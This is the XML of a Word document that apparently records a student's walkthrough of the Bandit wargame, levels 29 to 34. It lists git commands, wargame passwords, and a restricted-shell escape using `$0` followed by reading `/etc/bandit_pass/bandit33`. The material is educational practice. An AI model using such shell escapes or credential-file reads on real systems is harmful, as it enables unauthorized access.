      <w:r>
        <w:t>Steps:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="790416F4" w14:textId="77777777" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3">
      <w:r>
        <w:t>1. Listed all branches including remote ones</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CF17645" w14:textId="77777777" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3">
      <w:r>
        <w:t>2. Switched to dev branch</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4652F0A2" w14:textId="77777777" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3">
      <w:r>
        <w:t>3. Found password in README file on dev branch</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76E66033" w14:textId="77777777" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3"/>
    <w:p w14:paraId="7F056D33" w14:textId="1C1D8B5E" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3">
      <w:r>
        <w:t>Credentials:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E3B344B" w14:textId="77777777" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3">
      <w:r>
        <w:t>- Username: bandit30</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1051D0FB" w14:textId="77777777" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3">
      <w:r>
        <w:t>- Password: qp30ex3VLz5MDG1n91YowTv4Q8l7CDZL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DCAD559" w14:textId="77777777" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3"/>
    <w:p w14:paraId="59677898" w14:textId="0938A941" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3">
      <w:r>
        <w:t>Learning: Explore git branches to find information not present in main branch.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="718A4113" w14:textId="77777777" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1B00E745" w14:textId="77777777" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3"/>
    <w:p w14:paraId="2203FE29" w14:textId="77777777" w:rsidR="00462DB4" w:rsidRDefault="00462DB4" w:rsidP="00B305D3"/>
    <w:p w14:paraId="68FEF969" w14:textId="77777777" w:rsidR="00462DB4" w:rsidRDefault="00462DB4" w:rsidP="00B305D3"/>
    <w:p w14:paraId="7C1AAF06" w14:textId="77777777" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3"/>
    <w:p w14:paraId="26B97676" w14:textId="1A364FEF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lastRenderedPageBreak/>
        <w:t>Level 30 → Level 31</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34025B51" w14:textId="77777777" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3"/>
    <w:p w14:paraId="59761315" w14:textId="6E36B96F" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3">
      <w:r>
        <w:t>Tools Used: git tag, git show</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21C6F29C" w14:textId="77777777" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3"/>
    <w:p w14:paraId="68560650" w14:textId="4E38AD59" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3">
      <w:r>
        <w:t>Objective: Find password in git tag.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="473D1B61" w14:textId="77777777" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3"/>
    <w:p w14:paraId="0E503CCC" w14:textId="2D5CBE3C" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3">
      <w:r>
        <w:t>Commands Used:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61068712" w14:textId="52527510" w:rsidR="00B45AFD" w:rsidRDefault="00B45AFD" w:rsidP="00B45AFD">
      <w:r>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>mktemp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -d </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5278AA2F" w14:textId="0208CE42" w:rsidR="00B45AFD" w:rsidRDefault="00B45AFD" w:rsidP="00B45AFD">
      <w:r>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r>
        <w:t>git clone ssh://bandit30-git@localhost:2220/home/bandit30-git/repo</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A25B572" w14:textId="157DE6AF" w:rsidR="00B45AFD" w:rsidRDefault="00B45AFD" w:rsidP="00B45AFD">
      <w:r>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r>
        <w:t>cd repo</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13AED798" w14:textId="2C72CE9C" w:rsidR="00B45AFD" w:rsidRDefault="00B45AFD" w:rsidP="00B45AFD">
      <w:r>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r>
        <w:t>ls</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35919B64" w14:textId="3233625C" w:rsidR="00B45AFD" w:rsidRDefault="00B45AFD" w:rsidP="00B45AFD">
      <w:r>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r>
        <w:t>cat README.md</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E031582" w14:textId="5B441794" w:rsidR="00B45AFD" w:rsidRDefault="00B45AFD" w:rsidP="00B45AFD">
      <w:r>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r>
        <w:t>git log</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="475CEF52" w14:textId="404D267F" w:rsidR="00B45AFD" w:rsidRDefault="00B45AFD" w:rsidP="00B45AFD">
      <w:r>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r>
        <w:t>git branch</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5356077C" w14:textId="7F34FFD0" w:rsidR="00B45AFD" w:rsidRDefault="00B45AFD" w:rsidP="00B45AFD">
      <w:r>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r>
        <w:t>git branch -a</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="266A1310" w14:textId="4A7706F3" w:rsidR="00B45AFD" w:rsidRDefault="00B45AFD" w:rsidP="00B45AFD">
      <w:r>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">git tag </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52FAA2FC" w14:textId="1DEACF52" w:rsidR="00B305D3" w:rsidRDefault="00B45AFD" w:rsidP="00B45AFD">
      <w:r>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r>
        <w:t>git show secret</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="759A27D3" w14:textId="77777777" w:rsidR="00B45AFD" w:rsidRDefault="00B45AFD" w:rsidP="00B305D3"/>
    <w:p w14:paraId="744B8ACA" w14:textId="542048EA" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3">
      <w:r>
        <w:t>Steps:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11186125" w14:textId="77777777" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3">
      <w:r>
        <w:t>1. Listed available git tags</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F53825C" w14:textId="77777777" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3">
      <w:r>
        <w:t>2. Examined "secret" tag contents</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71BCECEB" w14:textId="77777777" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3">
      <w:r>
        <w:t>3. Found password in tag annotation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77D9E9FB" w14:textId="77777777" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3"/>
    <w:p w14:paraId="7DF230B3" w14:textId="19034410" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3">
      <w:r>
        <w:t>Credentials:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F43403B" w14:textId="77777777" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3">
      <w:r>
        <w:t>- Username: bandit31</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6204055A" w14:textId="77777777" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3">
      <w:r>
        <w:t>- Password: fb5S2xb7bRyFmAvQYQGEqsbhVyJqhnDy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F4E3971" w14:textId="77777777" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3"/>
    <w:p w14:paraId="06FE8589" w14:textId="77BD8E27" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3">
      <w:r>
        <w:t>Learning: Use git tags to mark and store additional information in repositories.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D55984E" w14:textId="77777777" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="07DC59AE" w14:textId="77777777" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3"/>
    <w:p w14:paraId="0ED3C5D0" w14:textId="77777777" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3"/>
    <w:p w14:paraId="6D588158" w14:textId="30A53249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31 → Level 32</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7767036D" w14:textId="77777777" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3"/>
    <w:p w14:paraId="45FB738B" w14:textId="23F60C8A" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3">
      <w:r>
        <w:t>Tools Used: git add, git commit, git push</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A8C7A94" w14:textId="77777777" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3"/>
    <w:p w14:paraId="5A476CDC" w14:textId="41F7F85F" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3">
      <w:r>
        <w:t xml:space="preserve">Objective: Push specific file to remote repository despite </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>gitignore</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01281FBF" w14:textId="77777777" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3"/>
    <w:p w14:paraId="7B56A478" w14:textId="5C39044F" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3">
      <w:r>
        <w:t>Commands Used:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71A15E01" w14:textId="4DDBDBC6" w:rsidR="00462DB4" w:rsidRDefault="00462DB4" w:rsidP="00462DB4">
      <w:r>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>mktemp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -d </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56A05269" w14:textId="1F9A6766" w:rsidR="00462DB4" w:rsidRDefault="00462DB4" w:rsidP="00462DB4">
      <w:r>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r>
        <w:t>git clone ssh://bandit30-git@localhost:2220/home/bandit30-git/repo</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F865E55" w14:textId="43781863" w:rsidR="00462DB4" w:rsidRDefault="00462DB4" w:rsidP="00462DB4">
      <w:r>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r>
        <w:t>cd repo</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40DDDB10" w14:textId="1CB855A5" w:rsidR="00462DB4" w:rsidRDefault="00462DB4" w:rsidP="00462DB4">
      <w:r>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r>
        <w:t>cat README.md</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A29DC24" w14:textId="169856F0" w:rsidR="00462DB4" w:rsidRDefault="00462DB4" w:rsidP="00462DB4">
      <w:r>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r>
        <w:t>nano key.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52EF170F" w14:textId="184B63D7" w:rsidR="00462DB4" w:rsidRDefault="00462DB4" w:rsidP="00462DB4">
      <w:r>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r>
        <w:t>git add key.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39548D51" w14:textId="4044A148" w:rsidR="00462DB4" w:rsidRDefault="00462DB4" w:rsidP="00462DB4">
      <w:r>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r>
        <w:t>rm .</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>gitignore</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="7BBE215B" w14:textId="32A4005D" w:rsidR="00462DB4" w:rsidRDefault="00462DB4" w:rsidP="00462DB4">
      <w:r>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r>
        <w:t>git add key.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4812A475" w14:textId="444BD2DE" w:rsidR="00462DB4" w:rsidRDefault="00462DB4" w:rsidP="00462DB4">
      <w:r>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r>
        <w:t>git commit -m "text"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D0CFF24" w14:textId="1937287C" w:rsidR="00B305D3" w:rsidRDefault="00462DB4" w:rsidP="00462DB4">
      <w:r>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r>
        <w:t>git push</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7799EFA0" w14:textId="77777777" w:rsidR="00462DB4" w:rsidRDefault="00462DB4" w:rsidP="00B305D3"/>
    <w:p w14:paraId="06A4E60B" w14:textId="7418D46B" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3">
      <w:r>
        <w:t>Steps:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F19DEED" w14:textId="77777777" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3">
      <w:r>
        <w:t>1. Created required key.txt file with specified content</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E8A2D60" w14:textId="77777777" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3">
      <w:r>
        <w:t>2. Removed .</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>gitignore</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> that was blocking the file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35FB7858" w14:textId="77777777" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3">
      <w:r>
        <w:t>3. Added, committed, and pushed the file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B4491DA" w14:textId="77777777" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3">
      <w:r>
        <w:t>4. Received password from remote repository</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="609C0F6A" w14:textId="77777777" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3"/>
    <w:p w14:paraId="5E0850B0" w14:textId="4D12686F" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3">
      <w:r>
        <w:t>Credentials:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000C6175" w14:textId="77777777" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3">
      <w:r>
        <w:t>- Username: bandit32</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76038018" w14:textId="77777777" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3">
      <w:r>
        <w:t>- Password: 3O9RfhqyAlVBEZpVb6LYStshZoqoSx5K</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F561A91" w14:textId="77777777" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3"/>
    <w:p w14:paraId="25463246" w14:textId="0821E8C9" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3">
      <w:r>
        <w:t xml:space="preserve">Learning: Understand git workflow and how </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>gitignore</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> affects file tracking.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11037C2D" w14:textId="77777777" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="789D5486" w14:textId="77777777" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3"/>
    <w:p w14:paraId="48CBDC7C" w14:textId="77777777" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3"/>
    <w:p w14:paraId="4FD65C29" w14:textId="4C86D650" w:rsidR="00B305D3" w:rsidRPr="0034564F" w:rsidRDefault="00B305D3" w:rsidP="00B305D3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32 → Level 33</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D9A65F0" w14:textId="77777777" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3"/>
    <w:p w14:paraId="5745883F" w14:textId="59061D32" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3">
      <w:r>
        <w:t>Tools Used: shell variable exploitation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2188ADA2" w14:textId="77777777" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3"/>
    <w:p w14:paraId="1379E40A" w14:textId="188B7F50" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3">
      <w:r>
        <w:t>Objective: Break out of uppercase shell restriction.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="462E1259" w14:textId="247D9005" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3"/>
    <w:p w14:paraId="7082BB71" w14:textId="1CDB4903" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3">
      <w:r>
        <w:t>Commands Used:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="625DD975" w14:textId="1BAE63D3" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3">
      <w:r>
        <w:t>- `$0` (to get normal shell)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F8A0894" w14:textId="25EB006B" w:rsidR="00462DB4" w:rsidRDefault="00462DB4" w:rsidP="00B305D3">
      <w:r>
        <w:t>- `</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>whoami</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="456C3DA3" w14:textId="6834B03A" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3">
      <w:r>
        <w:t>- `cat /etc/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>bandit_pass</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/bandit33`</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="648571C6" w14:textId="5D983C8E" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3"/>
    <w:p w14:paraId="6E6AB7C8" w14:textId="6858FB74" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3">
      <w:r>
        <w:t>Steps:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F19615B" w14:textId="77777777" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3">
      <w:r>
        <w:t>1. Found shell that converts all input to uppercase</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BB89089" w14:textId="64A614C6" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3">
      <w:r>
        <w:t>2. Used `$0` variable to spawn new shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="528DC59D" w14:textId="1DA26BEB" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3">
      <w:r>
        <w:t>3. Read final password</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23E2FCD1" w14:textId="737633A9" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3"/>
    <w:p w14:paraId="56099D2A" w14:textId="654CAAA3" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3">
      <w:r>
        <w:t>Credentials:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49DF39C9" w14:textId="378A656F" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3">
      <w:r>
        <w:t>- Username: bandit33</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13B8B295" w14:textId="215B7CDD" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3">
      <w:r>
        <w:t>- Password: tQdtbs5D5i2vJwDUNgPAVJbWYuGHVn9zl3j8</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FA7BA73" w14:textId="77777777" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3"/>
    <w:p w14:paraId="7E0B3093" w14:textId="51B6C03B" w:rsidR="00AE7386" w:rsidRDefault="00B305D3" w:rsidP="00B305D3">
      <w:r>
        <w:t>Learning: Exploit shell variables to bypass input restrictions and escape constrained environments.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AB99230" w14:textId="77777777" w:rsidR="0034564F" w:rsidRDefault="0034564F" w:rsidP="00B305D3">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7EFA8A1C" w14:textId="33F4D105" w:rsidR="0034564F" w:rsidRDefault="0034564F" w:rsidP="00B305D3"/>
    <w:p w14:paraId="0C40CF49" w14:textId="77777777" w:rsidR="00462DB4" w:rsidRDefault="00462DB4" w:rsidP="00B305D3"/>
    <w:p w14:paraId="1E8CB68E" w14:textId="37A98579" w:rsidR="0034564F" w:rsidRDefault="0034564F" w:rsidP="00B305D3"/>
    <w:p w14:paraId="40CF36D8" w14:textId="3C13F85D" w:rsidR="0034564F" w:rsidRPr="0034564F" w:rsidRDefault="0034564F" w:rsidP="0034564F">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0034564F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Level 3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidRPr="0034564F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve"> → Level 3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D1D2E7B" w14:textId="7523F1C3" w:rsidR="0034564F" w:rsidRDefault="0034564F" w:rsidP="0034564F"/>
    <w:p w14:paraId="04AD1710" w14:textId="575DE4CC" w:rsidR="0034564F" w:rsidRDefault="0034564F" w:rsidP="0034564F"/>
    <w:p w14:paraId="4EC9FCBA" w14:textId="4B1C6B9C" w:rsidR="0034564F" w:rsidRDefault="0034564F" w:rsidP="0034564F">
      <w:r>
        <w:t xml:space="preserve">Objective: </w:t>
      </w:r>
      <w:r>
        <w:t>Obtain the final message</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DFF8624" w14:textId="228D7F99" w:rsidR="0034564F" w:rsidRDefault="0034564F" w:rsidP="0034564F"/>
    <w:p w14:paraId="51502186" w14:textId="7150F551" w:rsidR="0034564F" w:rsidRDefault="0034564F" w:rsidP="0034564F">
      <w:r>
        <w:t>Commands Used:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A844A5A" w14:textId="3F8EC071" w:rsidR="0034564F" w:rsidRDefault="0034564F" w:rsidP="0034564F">
      <w:r>
        <w:t>- “ls” to list the files.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31D7F49E" w14:textId="725E8B5E" w:rsidR="0034564F" w:rsidRDefault="0034564F" w:rsidP="0034564F">
      <w:r>
        <w:t>- “cat README.md” to showcase the final message.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E0F35F9" w14:textId="59FE111A" w:rsidR="0034564F" w:rsidRDefault="0034564F" w:rsidP="0034564F"/>
    <w:p w14:paraId="3B772D1D" w14:textId="15FC2E92" w:rsidR="0034564F" w:rsidRDefault="00462DB4" w:rsidP="0034564F">
      <w:r w:rsidRPr="0034564F">
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251660288" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="7F8A45F5" wp14:editId="67ABBDEA">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>right</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>8183880</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4796155" cy="1912620"/>
            <wp:effectExtent l="0" t="0" r="4445" b="0"/>
            <wp:wrapTight wrapText="bothSides">
              <wp:wrapPolygon edited="0">
                <wp:start x="0" y="0"/>
                <wp:lineTo x="0" y="21299"/>
                <wp:lineTo x="21534" y="21299"/>
                <wp:lineTo x="21534" y="0"/>
                <wp:lineTo x="0" y="0"/>
              </wp:wrapPolygon>
            </wp:wrapTight>
            <wp:docPr id="6018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412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64F">
        <w:t xml:space="preserve">Message: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56EA4053" w14:textId="21780FA0" w:rsidR="0034564F" w:rsidRDefault="0034564F" w:rsidP="0034564F"/>
    <w:p w14:paraId="26CB9FC3" w14:textId="60A77BDC" w:rsidR="0034564F" w:rsidRDefault="0034564F" w:rsidP="0034564F"/>
    <w:p w14:paraId="20282ADF" w14:textId="46E51B8C" w:rsidR="0034564F" w:rsidRDefault="0034564F" w:rsidP="0034564F"/>
    <w:p w14:paraId="13F5BE03" w14:textId="1036804C" w:rsidR="0034564F" w:rsidRDefault="0034564F" w:rsidP="0034564F"/>
    <w:p w14:paraId="3D1ECFD9" w14:textId="1B387BB2" w:rsidR="0034564F" w:rsidRDefault="0034564F" w:rsidP="0034564F"/>
    <w:p w14:paraId="64DB36AB" w14:textId="18383787" w:rsidR="0034564F" w:rsidRDefault="0034564F" w:rsidP="0034564F"/>
    <w:p w14:paraId="12E88A2C" w14:textId="6A0B37E4" w:rsidR="0034564F" w:rsidRDefault="0034564F" w:rsidP="0034564F"/>
    <w:sectPr w:rsidR="0034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B22"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="E7426380"/>
    <w:lvl w:ilvl="0" w:tplc="51B88A2A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51A18"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="478C2E42"/>
